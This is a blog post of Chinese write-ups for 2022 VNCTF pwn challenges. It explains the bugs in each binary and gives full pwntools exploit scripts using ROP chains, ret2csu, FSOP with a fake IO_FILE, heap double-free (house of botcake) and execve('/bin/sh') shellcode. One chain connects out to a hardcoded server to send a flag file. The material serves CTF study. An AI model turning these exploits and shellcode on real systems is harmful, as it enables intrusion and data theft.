---
title: 2022 VNCTF pwn 复现
date: 2022-06-20 16:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=26/
pin: false
published:
---

## easyROPtocol

![image-20220620162556839](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220620162556839.png)

漏洞点在submit函数最多可进行4次提交(memcopy)，导致s上存在栈溢出

![image-20220620164712594](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220620164712594.png)

题目的难点在于输入的伪造

存在一个check_head以及chunk_sum，必须要在payload里伪造所需信息。第一次利用溢出泄露libc偏移，第二次利用溢出执行rorw实现沙箱绕过。由于`submit`函数返回时 rdx 寄存器的值为 6，可不用布置rdx的值。

![image-20220620164943689](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220620164943689.png)

![image-20220620165030100](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220620165030100.png)

![image-20220620165208378](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220620165208378.png)

```python
# _*_ coding:utf-8 _*_
from pwn import *
from Crypto.Util.number import bytes_to_long
# context.log_level='debug'

p = process("./pwn")
elf = ELF("./pwn")
libc = elf.libc

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def check(buf1):
    checksum = 0

    buf = ''+buf1
    head = "fakeipheadfa"
    for i in range(len(head)/2):
        checksum = checksum ^ int(head[:2][::-1].encode("hex"),16)
        head = head[2:]
    while True:
        checksum = checksum ^ bytes_to_long(buf[:2][::-1])
        buf = buf[2:]
        if buf == '':
            break
    return checksum

def packtcp(seq,buf,padding = 'a'):
    payload = p16(30318)+p16(10423)# +0/+2
    payload += p32(seq)# +4
    payload += p32(1)# +8
    payload += p16(0x18/4)# +12
    payload += p16(1)# +14
    payload += p16(0)# +18
    payload += p16(0)
    payload += p16(1)# +20
    payload += p16(0xffff)# +22
    payload += buf
    payload = payload.ljust(0x1000,padding)

    checksum = check(payload)
    payload = payload[:16]+p16(checksum)+payload[18:]# +0x10
    return payload

def menu(choice):
    sla("4. Quit.", choice)

def read_tcp(payload):
    menu(1)
    sleep(0.1)
    p.send(payload)

def delete(idx):
    menu(2)
    sleep(0.1)
    sla("Which?",idx)

def submit():
    menu(3)


pop_rdi = 0x0000000000401bb3
pop_rsi = 0x0000000000401bb1

read_tcp(packtcp(0x0001, "aaaa"))
read_tcp(packtcp(0x1001, "aaaa"))
read_tcp(packtcp(0x2001, "aaaa"))

payload = 'b'*0x68+'a'*8
payload += p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(elf.got['write'])+p64(0)+p64(elf.plt['write'])
payload += p64(0x401a5e)# main
read_tcp(packtcp(0x3001, payload,'\x00'))
submit()

libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['write']
success("libc_base = "+hex(libc_base))

delete(0)
delete(1)
delete(2)
delete(3)
read_tcp(packtcp(1, "aaaa"))
read_tcp(packtcp(0x1001, "aaaa"))
read_tcp(packtcp(0x2001, "aaaa"))
pop_rdx = 0x000000000011c371+libc_base
bss = 0x404240
payload = 'b'*0x60+'b'*2+'b'*8
payload +=p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(bss)+p64(0)+p64(pop_rdx)+p64(0x6)+p64(0)+p64(libc_base+libc.sym['read'])
payload += p64(pop_rdi)+p64(bss)+p64(pop_rsi)+p64(0)+p64(0)+p64(libc_base+libc.sym['open'])
payload +=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(bss)+p64(0)+p64(pop_rdx)+p64(0x30)+p64(0)+p64(libc_base+libc.sym['read'])
payload += p64(pop_rdi)+p64(bss)+p64(libc_base+libc.sym['puts'])# rorw
read_tcp(packtcp(0x3001, payload,'\x00'))
submit()
p.recv()
p.send("flag\x00")
p.interactive()
```



## clear_got(ret2csu/ret2syscall read+execve一波流）

![image-20220330161232884](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220330161232884.png)

溢出空间足够大，且自带syscall不考虑泄露地址

csu这一段不同程序略有不同

![image-20220330154922135](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220330154922135.png)

![image-20220330155736238](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220330155736238.png)

这是这道题的↓

![image-20220330160253189](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220330160253189.png)

```python
from pwn import *
# context.log_level = 'debug'
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

p = process('clear_got')
elf = ELF('clear_got')
# libc = ELF('./libc64.so')

payload = 'a'*0x68
payload += p64(0x4007EA)# gadget2
payload += p64(0xc01c8)
# 后边会call bx*8 0xc01c8*8=0x600e40 
# 里边存放的是init函数的地址0x400520(进行了一个rax是否为0的检测然后ret）dym段
# 同理也可以跳转到fini，0xc01ca*8=0x600e50 里面是0x400804（fini的地址）
payload += p64(0xc01c9)
payload += p64(0)
payload += p64(59)# sys_read执行完后会将读入的字节数存在rax中,59是execve
payload += p64(0x601060)# stdout 这里作一个输入区
payload += p64(0)
payload += p64(0x4007D0)# gadget1

payload += 'a'*8# 前面有个压低栈的行为，这里抬高，防止压低影响寄存器取值
payload += p64(0xc020d)
# 这里*8 = 0x601068 即stdout+8 
payload += p64(0xc020e)
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(0x601060)
payload += p64(0x40077e)# syscall->0->read
payload += p64(0x4007d0)# 再跑一次gadget1赋值
payload += 'e'*0x10# 填满补齐0x100
success("len:"+hex(len(payload)))
# gdb.attach(p)
p.send(payload)
payload = "/bin/sh\x00" + p64(0x40077e) + "\x00"*43 # sys_call->59->execve
p.sendline(payload)# sys_read
p.interactive()
```

## BingDwenDwen

一道经典的socket+connect，由于ban了mprotect，题目特意给了一个汇编写的backdoor，以及一些gadget，主要用来构造rop链

谈一下关于close(1)这种关闭的理解，它更像是关闭了fd槽位，对stdout以及_IO_2_1_stdout无影响，只需要开启对应槽位即可激活

比如这题socket开启了fd=0，输入也就可用了，我们再用dup开启fd=1，输出也就可用了。

狠一点的话就要用`fclose(stdout)`

![image-20220621221635451](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220621221635451.png)

![image-20220621221704726](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220621221704726.png)

![image-20220621221647233](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220621221647233.png)

```python
# _*_ coding:utf-8 _*_
from pwn import *
import socket
import struct
# context.log_level='debug'

p = process("./pwn")
# p = remote("node4.buuoj.cn","28559")
elf = ELF("./pwn")
libc = elf.libc

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

"""
0x000000000040136f : pop rax ; ret
0x00000000004011dd : pop rbp ; ret
0x000000000040136b : pop rdi ; ret
0x0000000000401369 : pop rdx ; ret
0x000000000040136d : pop rsi ; ret
"""
syscall_ret = 0x0000000000401351
pop_rdi = 0x0000000000401356
pop_rsi = 0x0000000000401358
pop_rdx = 0x0000000000401354
pop_rax = 0x000000000040135a
pop_rcx = 0x000000000040135d
# 这2个gadget题目给的,主要作用就是把rax给rdi
push_rax_pop_rcx = 0x000000000040135c#push rax ; pop rcx ; ret
mov_rdi_rcx = 0x000000000040135f # mov rdi rcx;ret


#socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
payload = "a"*0x10
payload += p64(pop_rdi)
payload += p64(2)# AF_INET
payload += p64(pop_rsi)
payload += p64(1)# SOCK_STREAM
payload += p64(pop_rdx)
payload += p64(0)# IPPROTO_IP
payload += p64(pop_rax)
payload += p64(0x29)
payload += p64(syscall_ret)
#connect(soc, (struct sockaddr *)&serv_addr, sizeof(struct sockaddr_in))
payload += p64(pop_rdi)
payload += p64(0)
payload += p64(pop_rsi)
payload += p64(0x4038e0)# [ip:socat]_addr
payload += p64(pop_rdx)
payload += p64(16)
payload += p64(pop_rax)
payload += p64(42)
payload += p64(syscall_ret)
# #dup2(soc, 0)# 这里可省略这一步
# payload += p64(pop_rdi)
# payload += p64(0)
# payload += p64(pop_rsi)
# payload += p64(0)
# payload += p64(pop_rax)
# payload += p64(33)
# payload += p64(syscall_ret)
#dup2(soc, 1)
payload += p64(pop_rdi)
payload += p64(0)
payload += p64(pop_rsi)
payload += p64(1)
payload += p64(pop_rax)
payload += p64(33)
payload += p64(syscall_ret)
# open flag
payload += p64(pop_rdi)
payload += p64(0x4038d0)# 'flag'
payload += p64(pop_rsi)
payload += p64(0)
payload += p64(pop_rax)
payload += p64(2)
payload += p64(syscall_ret)
#read(rax,0x403400,0x100)
payload += p64(push_rax_pop_rcx)
payload += p64(mov_rdi_rcx)
payload += p64(pop_rsi)
payload += p64(0x403400)
payload += p64(pop_rdx)
payload += p64(0x100)
payload += p64(pop_rax)
payload += p64(0)
payload += p64(syscall_ret)
#write(1,0x403400,0x100)
payload += p64(pop_rax)
payload += p64(1)
payload += p64(pop_rdi)
payload += p64(1)
payload += p64(syscall_ret)
payload = payload.ljust(0x1d0,"a")
payload += "flag\x00\x00\x00\x00"
payload += "\x00"*8
# 127.0.0.1 1000
# 这里可以用
# import socket
# remote_ip = 127.0.0.1
# print int(socket.inet_aton(remote_ip),16)
#其中0100007f为127.0.0.1 e803 为03e8即1000，0002为AF_INET
payload += p64(0x70909e96e8030002)#改成⾃⼰的服务器的ip端⼝
p.recv()
p.send(payload)

p.interactive()
```

## FShuiMaster(2.27/FSOP/offbynull)

![image-20220623174815433](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220623174815433.png)

申请chunk有限制，不能申请7f/7e开头的位置，size(0x42e-0x700)

![image-20220623175136742](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220623175136742.png)

自定义了一个输入函数get_input存在offbynull，

![image-20220623175103703](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220623175103703.png)

题目有5号功能，exit(-1)

```python
# _*_ coding:utf-8 _*_
from pwn import *
# context.log_level='debug'

p = process("./FShuiMaster")
# p = remote("node4.buuoj.cn","28559")
elf = ELF("./FShuiMaster")
libc = elf.libc

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def add(size,con='a'):
    sla("Five: Finished!",1)
    sla("Number of words?",size)
    p.sendafter("please input U character",con)
def edit(idx,con):
    sla("Five: Finished!",2)
    sla("please input the page U want 2 change",idx)
    p.sendlineafter("Now Change U this page :",con)
def show(idx):
    sla("Five: Finished!",4)
    sla("please Input The page U want 2 scan",idx)
def dele(idx):
    sla("Five: Finished!",3)
    sla("please Input the page U want 2 tear off",idx)

heap_arr = 0x4080

sla("Please Write U Name on the Book",'e4l4')
add(0x5f8)# 0
add(0x5f8)# 1
add(0x608)# 2
add(0x5f8)# 3
add(0x618)# 4
add(0x5f8)# 5
add(0x5f8)# 6
# 间隔free，申请到中间的chunk，利用largebin粘上地址
dele(0)
dele(2)
dele(4)

add(0x700)# 7
dele(4)
add(0x608)# 8
add(0x5f8)# 9

show(9)
libc_base = uu64()-0x3ec161
lg('libc_base')

show(8)
p.recvuntil("\n")
heap_base = u64(p.recvuntil('\n')[-7:-1].ljust(8,'\x00'))-0x261
lg('heap_base')
#--------------------------------------------------------------------
IO_list_all = libc_base + libc.sym['_IO_list_all']
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
bin_sh = libc_base + libc.search('/bin/sh\x00').next()
IO_str_jumps = libc_base+0x3e8360
lg('IO_list_all')
#--------------------------------------------------------------------
add(0x618)# 10
# offbynull向前合并，构造堆复用

dele(1)
edit(8,'b'*0x600+p64(0xC10))
dele(3)

# 申请回来，构造largebinattack，利用堆复用改bksize
add(0x5f8)# 11
add(0x608)# 12
add(0x5f8)# 13
dele(12)
add(0x700)# 14

edit(8,p64(libc_base+0x3ec110)*2+p64(heap_base+0xe50)+p64(IO_list_all-0x20))
dele(9)
add(0x700)# 15
add(0x5f8)# 16
edit(8,p64(libc_base+0x3ec110)*2+p64(heap_base+0xe50)*2)
add(0x608)# 17

def FILE(binsh,system,IO_str_jumps):
    fake_IO_FILE  = p64(0xfbad1800) + p64(0)*3
    fake_IO_FILE += p64(0) + p64(1) # fp->_IO_write_ptr > fp->_IO_write_base
    fake_IO_FILE += p64(0) + p64(binsh)
    fake_IO_FILE = fake_IO_FILE.ljust(0xC0,'\x00')
    fake_IO_FILE += p64(0) + p64(0)*2   # _mode <= 0
    fake_IO_FILE += p64(IO_str_jumps-8)
    fake_IO_FILE += p64(0) + p64(system)# 0xe8
    return fake_IO_FILE

fake_IO = FILE(bin_sh,system,IO_str_jumps)

edit(8,fake_IO[0x10:])
sla("Five: Finished!",5)

p.interactive()
```

## house of botcake(UAF)

从glibc 2.29开始tcache增加了key字段，一般来说我们需要覆盖掉key字段，才能进行double free操作。

house of botcake借用unsortbin来避免key字段实现doublefree堆复用(如果只是实现堆复用不去利用unsortbin上的libc地址，也可以借用fastbin)。

具体操作就是在填满 tcache 之后，再连续释放**两个相邻的堆块使其合并**(单个堆块会导致unsortbin双向链表损坏，从而导致无法申请unsortbin里的堆块，这里起到一个隔断作用)放到 unsorted bin 里，然后从tcache 中申请出一个堆块，再释放合并堆块下半部分堆块。那么这个下半部分chunk既出现在tcache里，又出现在unsorted bin里。 再通过错位切割直接申请unsortbin，就能控制tcache

![image-20220723104456758](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220723104456758.png)

![image-20220723110310852](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220723110310852.png)

### 技巧杂谈及适用条件

这种技巧通常用在没有泄露地址时，通过利用unsortbin上的地址实现爆破，特别是没有show功能时

由于要利用到堆自然合并以及tcache，可申请的size就不能在fastbin范围，要在tcache范围<0x420，同时2.27往上

错位切割是一种可以优先于tcache先申请unsortbin的方法，同时也能残留下unsortbin的地址

## HideOnHeap

![image-20220723091640757](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220723091640757.png)

题目的漏洞点主要在存在性判断上，edit功能判断了chunk和chunksize，而dele只判断了chunk，然后置零的是chunksize，导致这里有UAF，但是无法编辑，相当于是个double free漏洞。申请函数如下图，可申请0x20个chunk，最大size小于0x1500。

![image-20220723093255451](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220723093255451.png)

再一个就是这题没有show，甚至没有put和printf，只有write。导致没有办法直接劫持stdout泄露。

题目开始malloc了一个堆块存放flag，考虑直接劫持IO结构体泄露flag。

整个利用思路不泄露地址，用2个house of botcake，爆破申请到IO_stderr和global_fast_bin，用House of Corrosion任意地址写堆地址，劫持wrtiebase-write_end，然后用edit功能把flag位，以及泄露低位改为0，然后House of Corrosion改topchunksize，触发IO错误流，利用\__malloc_assert 中的 __fxprintf输出flag。

```python
# _*_ coding:utf-8 _*_
from pwn import *
# context.log_level='debug'


def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def add(size):
    sla("Choice:",1)
    sla("Size:",size)

def edit(idx,con):
    sla("Choice:",2)
    sla("Index:",idx)
    p.sendafter("Content:",con)

def dele(idx):
    sla("Choice:",3)
    sla("Index:",idx)

while True:
    p = process("./HideOnHeap")
    elf = ELF("./HideOnHeap")
    libc = elf.libc
    try:
        chunk = 0x4040
        chunksize = 0x4140

        add(0x88)#0
        add(0x88)#1
        for i in range(7):
            add(0x88)#2-8

        add(0x3f0)#9
        add(0x3f0)#10
        for i in range(7):
            add(0x3f0)#11-17
        #------------------------------------------------------
        edit(2,'a'*0x20+'\x00'*8+p64(0x21))
        edit(13,'a'*0x30+'\x00'*8+p64(0x21)+'\x00'*0x8+p64(0x21)+'\x00'*0x8+p64(0x21))

        for i in range(2,9):
            dele(i)
        dele(1)
        dele(0)

        add(0x88)# 0
        dele(1)# put in tcache

        for i in range(7):
            add(0x88)# 1-7
        add(0x118)# 8-lowhalf 1
        #---------------------------------------------------------
        for i in range(11, 18):
            dele(i)

        dele(10)
        dele(9)

        add(0x3F0)# 9
        dele(10)
        for i in range(7):
            add(0x3F0) #10-16

        add(0x3F0) #17
        add(0x3F0) #18 == 10
        #------------------------------------------------------------
        for i in range(7):
            dele(1)
            edit(8, '\x00' * 0x88 + p64(0x91) + '\x00' * 0x10)

        for i in range(7):
            dele(10)
            edit(18, '\x00' * 0x10)
        dele(1)
        dele(10)
        #------------------------------------------------------------

        add(0x58) #1
        add(0x18) #10

        add(0x3D8) #19
        add(0x18) #20

        edit(8, '\x00' * 0x88 + p64(0x91) + '\x80\xdb')
        add(0x88) # 21
        add(0x88) # 22 global_max_fast

        edit(18, '\xc0\xb5')
        add(0x3F0) # 23
        add(0x3F0) # 24 _IO_2_1_stderr_
        #------------------------------------------------------------
        edit(22, '\xFF' * 8) # change global_max_fast
        edit(8, '\x00' * 0x88 + p64(0x14C1))# _IO_write_base
        dele(21)
        edit(8, '\x00' * 0x88 + p64(0x14D1))# _IO_write_ptr
        dele(21)
        edit(8, '\x00' * 0x88 + p64(0x14E1))# _IO_write_end
        dele(21)
        #------------------------------------------------------------
        # change main_arena->top
        for i in range(8):
            edit(8, '\x00' * 0x88 + p64(0xC1) + '\x00' * 0x10)
            dele(21)

        edit(24, p64(0xfbad1800) + '\x00' * 0x19)
        edit(22, p64(0x80))
        add(0x300)
        break
    except:
        p.close()

p.interactive()
```

